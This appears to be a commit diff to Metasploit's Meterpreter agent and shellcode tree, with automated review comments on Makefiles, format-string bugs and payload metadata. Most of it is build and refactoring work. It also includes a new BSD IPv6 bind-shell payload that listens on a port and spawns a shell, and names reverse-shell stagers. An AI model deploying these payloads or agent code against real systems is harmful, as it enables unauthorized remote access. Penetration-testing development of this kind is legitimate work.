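- buf->st_ctime = (unsigned long long)sbuf.st_ctime;
+ buf->st_dev = sbuf.st_dev;
+ buf->st_ino = sbuf.st_ino;
+ buf->st_mode = sbuf.st_mode;
+ buf->st_nlink = sbuf.st_nlink;
+ buf->st_uid = sbuf.st_uid;
+ buf->st_gid = sbuf.st_gid;
+ buf->st_rdev = sbuf.st_rdev;
+ buf->st_size = sbuf.st_size;
+ buf->st_atime = (unsigned long long)sbuf.st_atime;
+ buf->st_mtime = (unsigned long long)sbuf.st_mtime;
+ buf->st_ctime = (unsigned long long)sbuf.st_ctime;
 return 0;
- } else {
- return ret;
- }
+ } else {
+ return ret;
+ }
 }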
304 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
@@ -1,39 +1,184 @@
#include "precomp.h"
+
#ifndef _WIN32
+
+struct iface {
+ unsigned char *name;
+ unsigned int addr_size;
+ unsigned char *addr;
+ unsigned char *netmask;
+ unsigned char *hwaddr;
+ int sa_family;
+};
+
/*
- * Determine the interfaces MAC address by interface name. It seems that libpcap does not
- * support this natively?
+ * Frees an ifaces array returned by get_ifaces
*/
+void free_ifaces(struct iface *ifaces, int count) {
+ int i;
-DWORD get_interface_mac_addr(char *interface, unsigned char *mac)
-{
- struct ifreq ifr;
- int fd = -1;
- DWORD result = ERROR_NOT_SUPPORTED;
-
- memset(mac, 0, 6);
- memset(&ifr, 0, sizeof(struct ifreq));
- strncpy(ifr.ifr_name, interface, sizeof(ifr.ifr_name)-1);
-
- do {
- fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP);
- if(fd == -1) break;
-
- if(ioctl(fd, SIOCGIFHWADDR, &ifr) == -1) {
- if(errno) result = errno;
+ if (!ifaces) {
+ return;
+ }
+
+ dprintf("Freeing %d interfaces", count);
+
+ for (i = 0; i < count; i++) {
+ if (ifaces[i].name) {
+ free(ifaces[i].name);
+ }
+ if (ifaces[i].addr) {
+ free(ifaces[i].addr);
+ }
+ if (ifaces[i].netmask) {
+ free(ifaces[i].netmask);
+ }
+ if (ifaces[i].hwaddr) {
+ free(ifaces[i].hwaddr);
+ }
+ }
+ free(ifaces);
+ return;
+}
+
+/*
+ * Populates +ifaces+ with an array of iface structs
+ *
+ * This is very Linux-specific, but hopefully the idea is generic enough that
+ * adding support for BSD and other Unixes will at least be possible in the
+ * future.
+ *
+ * Returns 0 on success or an errno if something went wrong.
+ *
+ */
+int get_ifaces(struct iface **ifaces, int *count) {
+ int result;
+ struct ifconf ifc = {0};
+ struct ifreq *ifr = NULL;
+ char buf[1024] = {0};
+ int sck = 0;
+ int i = 0;
+
+ unsigned int num_ifaces = 0;
+
+ /* Get a socket handle to use with all the IOCTL magic below. */
+ sck = socket(PF_INET, SOCK_DGRAM, 0);
+ if(sck < 0) {
+ dprintf("socket: %d: %s", errno, strerror(errno));
+ result = errno;
+ goto fail;
+ }
+
+ /* Query available interfaces. */
+ ifc.ifc_len = sizeof(buf);
+ ifc.ifc_buf = buf;
+ if(ioctl(sck, SIOCGIFCONF, &ifc) < 0) {
+ dprintf("ioctl SIOCGIFCONF: %d: %s", errno, strerror(errno));
+ result = errno;
+ goto fail;
+ }
+
+ /* Iterate through the list of interfaces. */
+ ifr = ifc.ifc_req;
+ num_ifaces = ifc.ifc_len / sizeof(struct ifreq);
+ *ifaces = calloc(num_ifaces, sizeof(struct iface));
+
+ *count = num_ifaces;
+
+ for (i = 0; i < num_ifaces; i++) {
+ struct ifreq *item = &ifr[i];
+ struct sockaddr *addr = &(item->ifr_addr);
+ unsigned int addr_size;
+ struct iface *iface = &(*ifaces)[i];
+
+ iface->name = malloc(strlen(item->ifr_name)+1);
+ memcpy(iface->name, item->ifr_name, strlen(item->ifr_name)+1);
+
+ /*
+ * SIOCGIFCONF will have gotten the name and ip addr, store them
+ */
+ switch (addr->sa_family) {
+ case AF_INET:
+ addr_size = 4;
+ iface->addr = malloc(addr_size);
+ memcpy(iface->addr, &(((struct sockaddr_in*)addr)->sin_addr), addr_size);
+ break;
+ case AF_INET6:
+ addr_size = 16;
+ iface->addr = malloc(addr_size);
+ memcpy(iface->addr, &(((struct sockaddr_in6*)addr)->sin6_addr), addr_size);
+ break;
+ default:
+ /* We don't know how to display this thing, it doesn't have an
+ * address, give up. This will likely result in bogus info in
+ * uninitialized memory being used for the remainder of the
+ * list.
+ *
+ * XXX Should we free this one and try to continue with the rest?
+ */
+ result = ENOTSUP;
+ goto fail;
+ }
+ iface->addr_size = addr_size;
+
+ /* Get the MAC address */
+ if(ioctl(sck, SIOCGIFHWADDR, item) < 0) {
+ dprintf("ioctl SIOCGIFHWADDR: %d: %s", errno, strerror(errno));
+ result = errno;
break;
}
+ iface->hwaddr = malloc(6);
+ memcpy(iface->hwaddr, &(item->ifr_hwaddr.sa_data), 6);
- memcpy(mac, ifr.ifr_hwaddr.sa_data, 6);
- result = 0;
- } while(0);
+ /* Get the netmask */
+ if(ioctl(sck, SIOCGIFNETMASK, item) < 0) {
+ dprintf("ioctl SIOCGIFNETMASK: %d: %s", errno, strerror(errno));
+ result = errno;
+ break;
+ }
+ iface->netmask = malloc(addr_size);
+ switch (addr->sa_family) {
+ case AF_INET:
+ memcpy(iface->netmask, &((struct sockaddr_in*)&(item->ifr_netmask))->sin_addr, addr_size);
+ break;
+ case AF_INET6:
+ memcpy(iface->netmask, &((struct sockaddr_in6*)&(item->ifr_netmask))->sin6_addr, addr_size);
+ break;
+ }
+
+ }
- if(fd != -1) close(fd);
+ return 0;
+fail:
return result;
}
+/*
+ * mainly for debugging
+ */
+char *get_ip_str(const struct sockaddr *sa, char *s, size_t maxlen)
+{
+ switch(sa->sa_family) {
+ case AF_INET:
+ inet_ntop(AF_INET, &(((struct sockaddr_in *)sa)->sin_addr),
+ s, maxlen);
+ break;
+
+ case AF_INET6:
+ inet_ntop(AF_INET6, &(((struct sockaddr_in6 *)sa)->sin6_addr),
+ s, maxlen);
+ break;
+
+ default:
+ strncpy(s, "Unknown AF", maxlen);
+ return NULL;
+ }
+
+ return s;
+}
+
#endif
/*
@@ -116,94 +261,49 @@ DWORD request_net_config_get_interfaces(Remote *remote, Packet *packet)
free(table);
#else
- Tlv entries[5]; // xxx, we can probably support more. ip aliases, etc.
- char errbuf[PCAP_ERRBUF_SIZE+4];
- pcap_if_t *interfaces, *iter;
- pcap_addr_t *addresses;
- unsigned char mac[6];
-
- interfaces = iter = NULL;
-
- memset(entries, 0, sizeof(entries));
-
- do {
- if(pcap_findalldevs(&interfaces, errbuf) == -1) {
- result = ENOMEM; // xxx, send errbuf to remote
- break;
- }
-
- for(iter = interfaces; iter != NULL ; iter = iter->next ) {
- entryCount = 0;
-
- if(strcmp(iter->name, "any") == 0) continue;
-
- dprintf("[%s] Processing %s", __FUNCTION__, iter->name);
-
- entries[entryCount].header.length = strlen(iter->name)+1;
- entries[entryCount].header.type = TLV_TYPE_MAC_NAME;
- entries[entryCount].buffer = (PUCHAR)iter->name;
- entryCount++;
-
- for(addresses = iter->addresses ; addresses != NULL ; addresses = addresses->next) {
- struct sockaddr_in *sin;
-
- dprintf("[%s/%s] addr = %p, netmask = %p, broadaddr = %p, dstaddr = %p", __FUNCTION__, iter->name);
- dprintf("[%s/%s] addresses->addr.sa_family = %d", __FUNCTION__, iter->name, addresses->addr->sa_family);
-
- if(addresses->addr == NULL) {
- dprintf("[%s/%s] addresses->addr = NULL ?", __FUNCTION__, iter->name);
- break;
- }
-
- if(addresses->addr->sa_family == AF_INET) {
- sin = (struct sockaddr_in *)(addresses->addr);
-
- entries[entryCount].header.length = sizeof(DWORD);
- entries[entryCount].header.type = TLV_TYPE_IP;
- entries[entryCount].buffer = (PUCHAR)&sin->sin_addr.s_addr;
- entryCount++;
-
- if(addresses->netmask) {
- sin = (struct sockaddr_in *)(addresses->netmask);
- entries[entryCount].header.length = sizeof(DWORD);
- entries[entryCount].header.type = TLV_TYPE_NETMASK;
- entries[entryCount].buffer = (PUCHAR)&sin->sin_addr.s_addr;
- entryCount++;
- }
-
-
-
- break;
- }
-
- }
-
- get_interface_mac_addr(iter->name, mac);
-
- entries[entryCount].header.length = 6;
- entries[entryCount].header.type = TLV_TYPE_MAC_ADDR;
- entries[entryCount].buffer = (PUCHAR)(mac);
- entryCount++;
+ struct iface *ifaces;
+ int count;
+ int i;
+ int if_error;
+ Tlv entries[4];
+
+ if_error = get_ifaces(&ifaces, &count);
+
+ if (if_error) {
+ result = if_error;
+ } else {
+ for (i = 0; i < count; i++) {
+
+ entries[0].header.length = strlen(ifaces[i].name)+1;
+ entries[0].header.type = TLV_TYPE_MAC_NAME;
+ entries[0].buffer = (PUCHAR)ifaces[i].name;
+
+ entries[1].header.length = 6;
+ entries[1].header.type = TLV_TYPE_MAC_ADDR;
+ entries[1].buffer = (PUCHAR)ifaces[i].hwaddr;
+
+ entries[2].header.length = ifaces[i].addr_size;
+ entries[2].header.type = TLV_TYPE_IP;
+ entries[2].buffer = (PUCHAR)ifaces[i].addr;
+
+ entries[3].header.length = ifaces[i].addr_size;
+ entries[3].header.type = TLV_TYPE_NETMASK;
+ entries[3].buffer = (PUCHAR)ifaces[i].netmask;
-
- dprintf("[%s] adding response with %d entries", __FUNCTION__, entryCount);
- packet_add_tlv_group(response, TLV_TYPE_NETWORK_INTERFACE, entries, entryCount);
- dprintf("[%s] done with adding", __FUNCTION__);
+ packet_add_tlv_group(response, TLV_TYPE_NETWORK_INTERFACE, entries, 4);
}
-
- } while(0);
-
- if(interfaces) {
- dprintf("[%s] calling pcap_freealldevs()", __FUNCTION__);
- pcap_freealldevs(interfaces);
}
- dprintf("[%s] and done!", __FUNCTION__);
-
+ if (ifaces)
+ free_ifaces(ifaces, count);
#endif
// Transmit the response if valid
packet_transmit_response(result, remote, response);
return result;
}
+
+
+
+
2 external/source/meterpreter/source/server/linux/netlink.c
@@ -144,7 +144,7 @@ int netlink_parse(int fd, int seq, netlink_cb_t callback, void *data)
if(nh->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *me = (struct nlmsgerr *) NLMSG_DATA (nh);
- dprintf("[%s] in NLMSG_ERROR handling.. me = %p", __FUNCTION__);
+ dprintf("[%s] in NLMSG_ERROR handling.. me = %p", __FUNCTION__, me);
dprintf("[%s] me->error = %d", __FUNCTION__, me->error);
if(me->error) {
dprintf("[%s] so, we have: nlmsg_len: %d, nlmsg_type: %d, nlmsg_flags: %d, nlmsg_seq: %d, nlmsg_pid: %d",
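Review bot: The added `me` argument fixes a `%p` with no matching vararg, and server_setup.c gets the same one-argument fix for its `%d` in `"[SERVER] Flushed %d bytes from the buffer"`; both read whatever happened to be on the stack into the log until now. If `dprintf` ultimately resolves to a real variadic function rather than a macro that discards its arguments, declaring it with `__attribute__((format(printf, N, N+1)))` (N being the position of the format string) lets the compiler reject this class of mismatch at every call site instead of fixing them one at a time. netlink_parse's body continues outside the hunk.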
71 external/source/meterpreter/source/server/rtld/Makefile
@@ -1,66 +1,61 @@
-CFLAGS=-I${PWD}/hack
+CFLAGS+=-I${PWD}/hack
CFLAGS+= -I ../../bionic/libc/include -I ../../bionic/libc/kernel/common/linux/ -I ../../bionic/libc/kernel/common/ -I ../../bionic/libc/arch-x86/include/
CFLAGS+= -I ../../bionic/libc/kernel/arch-x86/ -I../../source/server/elf/headers -I../../bionic/libc/private -fPIC -DPIC
CFLAGS+= -nostdinc -nostdlib -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -DANDROID_X86_LINKER
-#CFLAGS+= -ggdb
CFLAGS+= -DMETSRV_RTLD -D_BYTE_ORDER=_LITTLE_ENDIAN
CFLAGS+= -march=i386 -m32
OBJ=msflinker.o basic_libc.o syscall.o linker_format.o dlfcn.o zlib.o metsrv_rtld.o
-all: msflinker msflinker.bin rtldtest
-
-msflinker: $(OBJ)
- gcc -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
- strip msflinker
-
-msflinker.bin: msflinker elf2bin.c
- gcc -march=i386 -m32 -o elf2bin elf2bin.c
- ./elf2bin msflinker msflinker.bin
+compiled=../../bionic/compiled
-libc.h: ../../bionic/compiled/libc.so
- strip --strip-debug ../../bionic/compiled/libc.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libc.so libc
+# These are all generated from their .so counterparts below
+HEADERS=libc.h \
+ libm.h \
+ libcrypto.h \
+ libssl.h \
+ libsupport.h \
+ libmetsrv_main.h \
+ libpcap.h
-libm.h: ../../bionic/compiled/libm.so
- strip --strip-debug ../../bionic/compiled/libm.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libm.so libm
-libcrypto.h: ../../bionic/compiled/libcrypto.so
- strip --strip-debug ../../bionic/compiled/libcrypto.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libcrypto.so libcrypto
+all: msflinker msflinker.bin rtldtest
-libssl.h: ../../bionic/compiled/libssl.so
- strip --strip-debug ../../bionic/compiled/libssl.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libssl.so libssl
+debug: DEBUG=true
+debug: CFLAGS+=-ggdb
+debug: all
-libsupport.h: ../../bionic/compiled/libsupport.so
- strip --strip-debug ../../bionic/compiled/libsupport.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libsupport.so libsupport
+%.h: $(compiled)/%.so
+ [ "$(DEBUG)" != "true" ] && strip --strip-debug $<
+ (export SO=$<; perl ../../../tools/so2h.pl $< $$(basename $${SO%.so}))
-libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so
- strip --strip-debug ../../bionic/compiled/libmetsrv_main.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main
+msflinker: $(OBJ)
+ $(CC) -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
+ [ "$(DEBUG)" != "true" ] && strip $@
-libpcap.h: ../../bionic/compiled/libpcap.so
- strip --strip-debug ../../bionic/compiled/libpcap.so
- perl ../../../tools/so2h.pl ../../bionic/compiled/libpcap.so libpcap
+# elf2bin only has to run on the build machine, don't bother with CFLAGS
+msflinker.bin: msflinker elf2bin.c
+ $(CC) -march=i386 -m32 -o elf2bin elf2bin.c
+ ./elf2bin msflinker msflinker.bin
-metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
+metsrv_rtld.o: $(HEADERS)
rtldtest: rtldtest.c msflinker
- gcc -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
+ $(CC) -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
-.s.o:
- gcc $(CFLAGS) -c $<
+.S.o:
+ $(CC) $(CFLAGS) -c $<
.c.o:
- gcc $(CFLAGS) -c $<
+ $(CC) $(CFLAGS) -c $<
clean:
- rm -f libmetsrv_main.h libssl.h libcrypto.h libm.h libc.h libsupport.h
+ rm -f $(HEADERS)
rm -f *.o
rm -f msflinker msflinker.bin msflinker.so
rm -f rtldtest elf2bin
+
+.PHONY: clean
+
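Review bot: The recipe line `[ "$(DEBUG)" != "true" ] && strip --strip-debug $<` in the new `%.h` pattern rule (and the matching `[ "$(DEBUG)" != "true" ] && strip $@` under `msflinker`) exits non-zero precisely when DEBUG is true, because the failed test is the last command's status, so `make debug` aborts on the first header it generates. Inverting the test keeps the skip and a zero exit: `[ "$(DEBUG)" = "true" ] || strip --strip-debug $<` and `[ "$(DEBUG)" = "true" ] || strip $@`. The new `debug` target and `all` are also absent from the `.PHONY: clean` line added at the bottom.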
2 external/source/meterpreter/source/server/rtld/metsrv_rtld.c
@@ -224,7 +224,7 @@ int dlsocket(void *libc)
fd = libc_socket(AF_INET, SOCK_STREAM, 0);
if(fd == -1) break;
- sin.sin_addr.s_addr = libc_inet_addr("127.0.0.1");
+ sin.sin_addr.s_addr = libc_inet_addr("127.1.1.1");
sin.sin_port = htons(4444);
sin.sin_family = AF_INET;
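Review bot: The loopback target in dlsocket moves from `127.0.0.1` to `127.1.1.1` with nothing recording why; presumably it avoids colliding with something already bound to 127.0.0.1:4444 on the host running this test, but the next reader cannot tell and may revert it. A one-line comment beside the assignment, `/* deliberately not 127.0.0.1: <reason> */` with the actual reason filled in, would prevent that. dlsocket starts and ends outside the hunk.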
2 external/source/meterpreter/source/server/server_setup.c
@@ -133,7 +133,7 @@ static VOID server_socket_flush( Remote * remote )
break;
ret = recv(fd, buff, sizeof(buff), 0);
- dprintf("[SERVER] Flushed %d bytes from the buffer");
+ dprintf("[SERVER] Flushed %d bytes from the buffer", ret);
// The socket closed while we waited
if(ret == 0) {
4 external/source/meterpreter/workspace/common/Makefile
@@ -55,6 +55,10 @@ CFLAGS+= -I$(ARCHVPATH)
all: libsupport.so
+debug: CFLAGS+=-ggdb
+debug: all
+
+
libsupport.so: $(objects)
# Specify that we only want sysv aka DT_HASH hash tables, not DT_GNU_HASH,
# because that's what msflinker (modified bionic linker) can handle
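Review bot: The new `debug` target in this Makefile does not appear to be declared `.PHONY` in the hunk, so a stray file named `debug` in the directory would make `make debug` report nothing to be done; the same `debug: CFLAGS+=-ggdb` / `debug: all` pair is added without a `.PHONY` update in ext_posix_sample/Makefile, metsrv/Makefile and rtld/Makefile, whereas ext_server_networkpug, ext_server_sniffer and ext_server_stdapi all extend theirs to `.PHONY: clean debug`. Adding `.PHONY: all clean debug` to the ones that lack it (or extending an existing line, if one is outside the hunk) keeps the seven Makefiles consistent. The two extra blank lines after `debug: all` here and in ext_server_sniffer are a minor style nit.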
5 external/source/meterpreter/workspace/ext_posix_sample/Makefile
@@ -11,7 +11,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport
@@ -21,6 +21,9 @@ objects = test.o
all: posix_sample.so
+debug: CFLAGS+=-ggdb
+debug: all
+
posix_sample.so: test.o
gcc -shared $(CFLAGS) -o $@ $(objects)
22 external/source/meterpreter/workspace/ext_server_networkpug/Makefile
@@ -1,22 +1,22 @@
VPATH=../../source/extensions/networkpug
-OPENSSL=${PWD}/../../source/openssl/include
-COMMON=${PWD}/../../source/common
+OPENSSL=../../source/openssl/include
+COMMON=../../source/common
SERVER=../../source/server
PCAP=../../source/libpcap
+LIBC=../../source/bionic/libc
-CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall
+CFLAGS=-nostdinc -nostdlib -fPIC -DPIC -Wall
CFLAGS+=-D_UNIX -D__linux__
-CFLAGS+=-I${COMMON} -I${SERVER} -I${OPENSSL} -I${PCAP}
-CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/common/linux/ -I ../../source/bionic/libc/kernel/common/ -I ../../source/bionic/libc/arch-x86/include/
-CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
+CFLAGS+=-I$(COMMON) -I$(SERVER) -I$(OPENSSL) -I$(PCAP)
+CFLAGS+= -I$(LIBC)/include -I$(LIBC)/kernel/common/linux/ -I$(LIBC)/kernel/common/ -I$(LIBC)/arch-x86/include/
+CFLAGS+= -I$(LIBC)/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -fPIC -Os
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
-CFLAGS+= -march=i386 -m32
+CFLAGS+= -march=i386 -m32 -Os
#LDFLAGS= -fPIC -Bshareable -lc
@@ -31,11 +31,13 @@ objects = networkpug.o
all: ext_server_networkpug.so
+debug: CFLAGS+= -ggdb
+debug: all
ext_server_networkpug.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
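Review bot: The rewritten base line `CFLAGS=-nostdinc -nostdlib -fPIC -DPIC -Wall` drops `-fno-stack-protector`, while ext_server_stdapi/Makefile keeps it on its base line and adds it again in an `else` branch further down. Because these objects are built with `-nostdlib` against the bundled bionic, a toolchain that enables the stack protector by default will emit `__stack_chk_fail` references and canary loads that this environment may not provide, which tends to surface as a load-time failure of the extension rather than a link error. If the lines between the two hunks (not visible here) re-add the flag conditionally the way stdapi does, this is fine; otherwise the flag should stay on the base line.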
8 external/source/meterpreter/workspace/ext_server_sniffer/Makefile
@@ -12,7 +12,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
CFLAGS+= -I.
@@ -24,9 +24,13 @@ objects = sniffer.o
all: ext_server_sniffer.so
+debug: CFLAGS+= -ggdb
+debug: all
+
+
ext_server_sniffer.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -lpcap -lssl -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
26 external/source/meterpreter/workspace/ext_server_stdapi/Makefile
@@ -4,18 +4,17 @@ OPENSSL=../../source/openssl/include
COMMON=../../source/common
SERVER=../../source/server
-CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -g -Wall
+CFLAGS=-fno-stack-protector -nostdinc -nostdlib -fPIC -DPIC -Wall
CFLAGS+=-D_UNIX -D__linux__
CFLAGS+=-I${COMMON} -I${SERVER} -I${OPENSSL}
CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/common/linux/ -I ../../source/bionic/libc/kernel/common/ -I ../../source/bionic/libc/arch-x86/include/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/ -I../../source/libpcap
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -fPIC -Os
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport -lmetsrv_main -lpcap
-CFLAGS+= -march=i386 -m32
+CFLAGS+= -march=i386 -m32 -Os
#LDFLAGS= -fPIC -Bshareable -lc
@@ -26,21 +25,30 @@ else
CFLAGS+= -fno-stack-protector -D__linux__
endif
-objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \
+objects = \
+ server/fs/dir.o \
+ server/fs/file.o \
server/fs/fs_util.o \
- server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \
- server/sys/config/config.o server/sys/process/process.o server/sys/process/linux-in-mem-exe.o \
+ server/general.o \
server/net/config/interface.o \
server/net/config/route.o \
-
+ server/net/socket/tcp.o \
+ server/net/socket/tcp_server.o \
+ server/net/socket/udp.o \
+ server/stdapi.o \
+ server/sys/config/config.o \
+ server/sys/process/linux-in-mem-exe.o \
+ server/sys/process/process.o \
all: ext_server_stdapi.so
+debug: CFLAGS+=-ggdb
+debug: all
ext_server_stdapi.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) $(objects) -lpcap -lcrypto -o $@
-.PHONY: clean
+.PHONY: clean debug
clean:
rm -f *.o *.so *~; rm -f $(objects)
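Review bot: The last entry of the rebuilt `objects` list, `server/sys/process/process.o \`, still ends in a line continuation whose next line is blank; GNU make accepts that, but it is fragile, since deleting the blank line later would pull `all: ext_server_stdapi.so` into the variable. Dropping the trailing backslash on the final entry removes the trap. This Makefile also keeps `-fno-stack-protector` on its base CFLAGS line, which is the behaviour ext_server_networkpug/Makefile loses in this same commit.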
5 external/source/meterpreter/workspace/metsrv/Makefile
@@ -11,7 +11,7 @@ CFLAGS+= -I ../../source/bionic/libc/include -I ../../source/bionic/libc/kernel/
CFLAGS+= -I ../../source/bionic/libc/kernel/arch-x86/
CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
+CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -march=i386 -m32
@@ -25,6 +25,9 @@ objects+= server_setup.o remote_dispatch_common.o remote_dispatch.o netlink.o
all: libmetsrv_main.so
+debug: CFLAGS+=-ggdb
+debug: all
+
libmetsrv_main.so: $(objects)
$(CC) -Wl,--hash-style=sysv -shared $(CFLAGS) -o $@ $(objects) -export-dynamic -lc -lcrypto -lssl -lgcc -ldl -lsupport
5 external/source/shellcode/Makefile.incl
@@ -1,2 +1,3 @@
-BUILDASM=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
-BUILDASMBSD=do echo -n "Building $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+BUILDASM=do echo -n "Building (ASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && ld $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
+
+BUILDASMBSD=do echo -n "Building (BSDASM) $$i..." && nasm -f bin $$i.asm -o $$i.o && nasm -f elf $$i.asm -o $$i.o.tmp && gcc $$i.o.tmp -o $$i && rm -f $$i.o.tmp && xxd -c 16 -ps $$i.o | sed 's/\([0123456789abcdef][0123456789abcdef]\)/\\x\1/g' > $$i.hex && wc -c $$i.o | awk '{print $$1}' ; ndisasm -b 32 $$i.o > $$i.disasm
4 external/source/shellcode/bsd/ia32/Makefile
@@ -1,7 +1,7 @@
ASM=nasm
-STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse
+STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6
STAGES=stage_tcp_shell
-SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock
+SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6
OBJS=${STAGERS} ${STAGES} ${SINGLE}
include ../../Makefile.incl
36 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
@@ -0,0 +1,36 @@
+;;
+;
+; Name: single_bind_tcp_shell
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single portbind TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Shell
+; meta-description=Listen on a port and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=bind
+; meta-name=bind_tcp_shell
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=0x8
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+
+%include "generic.asm"
+%include "stager_sock_bind_ipv6.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
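Review bot: The header of this new file still carries the IPv4 variant's identity (`Name: single_bind_tcp_shell`, `meta-name=bind_tcp_shell`, `meta-offset-lport=0x8`) although it now includes stager_sock_bind_ipv6.asm, whose own header records the port at a different offset (`meta-offset-lport=26`). single_reverse_tcp_shell_ipv6.asm has the same copy-paste (`Name: single_reverse_tcp_shell`, `meta-name=reverse_tcp_shell`, the old `meta-offset-lhost`/`meta-offset-lport` values) and omits the `meta-offset-scope` that stager_sock_reverse_ipv6.asm declares. The Name and meta-name lines should gain the `_ipv6` suffix, and the offset metadata should be regenerated from the assembled output rather than inherited, since anything that trusts these headers will otherwise describe the wrong bytes.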
